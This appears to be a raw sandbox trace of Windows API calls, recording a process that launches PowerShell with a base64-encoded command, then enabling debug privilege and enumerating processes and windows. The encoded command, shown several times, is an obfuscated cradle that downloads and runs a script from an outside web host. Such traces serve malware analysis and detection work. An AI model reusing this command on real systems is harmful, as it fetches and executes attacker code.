	[0439.516] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c9ddfa0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x37ba1a0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x37ba1a0*(hProcess=0x3ac, hThread=0x3a8, dwProcessId=0x1678, dwThreadId=0x167c)) returned 1
	[0439.847] CoTaskMemFree (pv=0x1b9d5020) 
	[0439.849] CloseHandle (hObject=0x3a8) returned 1
	[0439.849] CoTaskMemAlloc (cb=0x3b) returned 0x1b9c58f0
	[0439.849] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c9de048, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c9de048) returned 0x4550
	[0439.849] CoTaskMemFree (pv=0x1b9c58f0) 
	[0439.852] GetCurrentProcess () returned 0xffffffffffffffff
	[0439.852] GetCurrentProcess () returned 0xffffffffffffffff
	[0439.853] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c9de128, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c9de128*=0x3a8) returned 1

Process:
	id = "36"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x14a12000"
	os_pid = "0x9bc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 192
	os_tid = 0xbac

	[0292.139] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0456.314] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0458.386] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0458.386] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0458.386] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0458.386] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0463.108] GetVersionExW (in: lpVersionInformation=0x12daa0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12daa0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0463.110] GetVersionExW (in: lpVersionInformation=0x12daa0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12daa0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0463.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0463.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0463.123] GetVersionExW (in: lpVersionInformation=0x12d810*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12d810*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0463.123] SetErrorMode (uMode=0x1) returned 0x1
	[0463.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12d970 | out: lpFileInformation=0x12d970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0463.125] SetErrorMode (uMode=0x1) returned 0x1
	[0463.128] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dbe0 | out: lpdwHandle=0x12dbe0) returned 0x94c
	[0463.130] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c272d8 | out: lpData=0x2c272d8) returned 1
	[0463.132] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12db58, puLen=0x12db50 | out: lplpBuffer=0x12db58*=0x2c27374, puLen=0x12db50) returned 1
	[0463.135] lstrlenW (lpString="䅁") returned 1
	[0463.143] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12dac8, puLen=0x12dac0 | out: lplpBuffer=0x12dac8*=0x2c27450, puLen=0x12dac0) returned 1
	[0463.144] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0463.146] CoTaskMemAlloc (cb=0x2e) returned 0x3a8f60
	[0463.146] lstrcpyW (in: lpString1=0x3a8f60, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0463.147] CoTaskMemFree (pv=0x3a8f60) 
	[0463.147] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12dac8, puLen=0x12dac0 | out: lplpBuffer=0x12dac8*=0x2c274a4, puLen=0x12dac0) returned 1
	[0463.147] lstrlenW (lpString="System.Management.Automation") returned 28
	[0463.147] CoTaskMemAlloc (cb=0x3c) returned 0x2e9860
	[0463.148] lstrcpyW (in: lpString1=0x2e9860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0463.148] CoTaskMemFree (pv=0x2e9860) 
	[0463.148] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12dac8, puLen=0x12dac0 | out: lplpBuffer=0x12dac8*=0x2c27500, puLen=0x12dac0) returned 1
	[0463.148] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0463.148] CoTaskMemAlloc (cb=0x20) returned 0x3a82b0
	[0463.148] lstrcpyW (in: lpString1=0x3a82b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0463.148] CoTaskMemFree (pv=0x3a82b0) 
	[0463.148] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12dac8, puLen=0x12dac0 | out: lplpBuffer=0x12dac8*=0x2c27540, puLen=0x12dac0) returned 1
	[0463.148] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0463.148] CoTaskMemAlloc (cb=0x44) returned 0x2e9860
	[0463.148] lstrcpyW (in: lpString1=0x2e9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0463.148] CoTaskMemFree (pv=0x2e9860) 
	[0463.148] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12dac8, puLen=0x12dac0 | out: lplpBuffer=0x12dac8*=0x2c275a8, puLen=0x12dac0) returned 1
	[0463.148] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0463.148] CoTaskMemAlloc (cb=0x76) returned 0x354ad0
	[0463.148] lstrcpyW (in: lpString1=0x354ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0463.148] CoTaskMemFree (pv=0x354ad0) 
	[0463.148] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12dac8, puLen=0x12dac0 | out: lplpBuffer=0x12dac8*=0x2c27644, puLen=0x12dac0) returned 1
	[0463.148] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0463.149] CoTaskMemAlloc (cb=0x44) returned 0x2e9860
	[0463.149] lstrcpyW (in: lpString1=0x2e9860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0463.149] CoTaskMemFree (pv=0x2e9860) 
	[0463.149] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12dac8, puLen=0x12dac0 | out: lplpBuffer=0x12dac8*=0x2c276a8, puLen=0x12dac0) returned 1
	[0463.149] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0463.149] CoTaskMemAlloc (cb=0x58) returned 0x305ff0
	[0463.149] lstrcpyW (in: lpString1=0x305ff0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0463.149] CoTaskMemFree (pv=0x305ff0) 
	[0463.149] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12dac8, puLen=0x12dac0 | out: lplpBuffer=0x12dac8*=0x2c27724, puLen=0x12dac0) returned 1
	[0463.149] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0463.149] CoTaskMemAlloc (cb=0x20) returned 0x3a82b0
	[0463.149] lstrcpyW (in: lpString1=0x3a82b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0463.149] CoTaskMemFree (pv=0x3a82b0) 
	[0463.149] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12dac8, puLen=0x12dac0 | out: lplpBuffer=0x12dac8*=0x2c273cc, puLen=0x12dac0) returned 1
	[0463.149] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0463.149] CoTaskMemAlloc (cb=0x66) returned 0x31f7c0
	[0463.149] lstrcpyW (in: lpString1=0x31f7c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0463.149] CoTaskMemFree (pv=0x31f7c0) 
	[0463.150] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12dac8, puLen=0x12dac0 | out: lplpBuffer=0x12dac8*=0x0, puLen=0x12dac0) returned 0
	[0463.150] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12dac8, puLen=0x12dac0 | out: lplpBuffer=0x12dac8*=0x0, puLen=0x12dac0) returned 0
	[0463.150] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12dac8, puLen=0x12dac0 | out: lplpBuffer=0x12dac8*=0x0, puLen=0x12dac0) returned 0
	[0463.150] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x2c27374, puLen=0x12da90) returned 1
	[0463.151] CoTaskMemAlloc (cb=0x204) returned 0x34c970
	[0463.151] VerLanguageNameW (in: wLang=0x0, szLang=0x34c970, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0463.652] CoTaskMemFree (pv=0x34c970) 
	[0463.652] VerQueryValueW (in: pBlock=0x2c272d8, lpSubBlock="\\", lplpBuffer=0x12dae8, puLen=0x12dae0 | out: lplpBuffer=0x12dae8*=0x2c27300, puLen=0x12dae0) returned 1
	[0463.656] GetCurrentProcessId () returned 0x9bc
	[0463.670] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12ca10 | out: lpLuid=0x12ca10*(LowPart=0x14, HighPart=0)) returned 1
	[0463.672] GetCurrentProcess () returned 0xffffffffffffffff
	[0463.673] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x12ca30 | out: TokenHandle=0x12ca30*=0x2e0) returned 1
	[0463.673] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2c2ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0463.675] CloseHandle (hObject=0x2e0) returned 1
	[0463.678] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9bc) returned 0x2e0
	[0463.685] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2c2abb8, cb=0x200, lpcbNeeded=0x12da48 | out: lphModule=0x2c2abb8, lpcbNeeded=0x12da48) returned 1
	[0463.687] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2c2ae28, cb=0x18 | out: lpmodinfo=0x2c2ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0463.688] CoTaskMemAlloc (cb=0x804) returned 0x3af6f0
	[0463.688] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x3af6f0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0463.688] CoTaskMemFree (pv=0x3af6f0) 
	[0463.689] CoTaskMemAlloc (cb=0x804) returned 0x3af6f0
	[0463.689] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x3af6f0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0463.689] CoTaskMemFree (pv=0x3af6f0) 
	[0463.690] CloseHandle (hObject=0x2e0) returned 1
	[0463.697] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x9bc) returned 0x2e0
	[0464.791] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x12db78 | out: lpExitCode=0x12db78*=0x103) returned 1
	[0464.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c2b088, Length=0x20000, ResultLength=0x12db40 | out: SystemInformation=0x12c2b088, ResultLength=0x12db40*=0x2c2b0) returned 0xc0000004
	[0464.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c4b0b8, Length=0x2eab0, ResultLength=0x12db40 | out: SystemInformation=0x12c4b0b8, ResultLength=0x12db40*=0x2c2b0) returned 0x0
	[0464.810] EnumWindows (lpEnumFunc=0x28b66ac, lParam=0x0) returned 1
	[0464.811] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.811] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x558
	[0464.811] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.811] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.811] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.811] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x538
	[0464.811] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.811] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x778
	[0464.811] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x778
	[0464.811] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.811] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x460
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x4d0
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1694
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1770
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1720
	[0464.812] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x165c
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1578
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x16c0
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x161c
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1638
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x15c8
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1554
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1674
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1520
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x14bc
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xf8c
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xe9c
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1434
	[0464.813] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x14ec
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xfcc
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x12ac
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1484
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x934
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xc0c
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xb08
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x948
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1178
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x13e0
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xcd0
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x13fc
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xdc8
	[0464.814] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xc18
	[0464.815] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xc2c
	[0464.815] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xa1c
	[0464.815] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1244
	[0464.815] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0xdb0
	[0464.815] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1398
	[0464.815] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1358
	[0464.815] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1370
	[0464.815] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x1340
	[0464.815] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x12d8a0 | out: lpdwProcessId=0x12d8a0) returned 0x130c
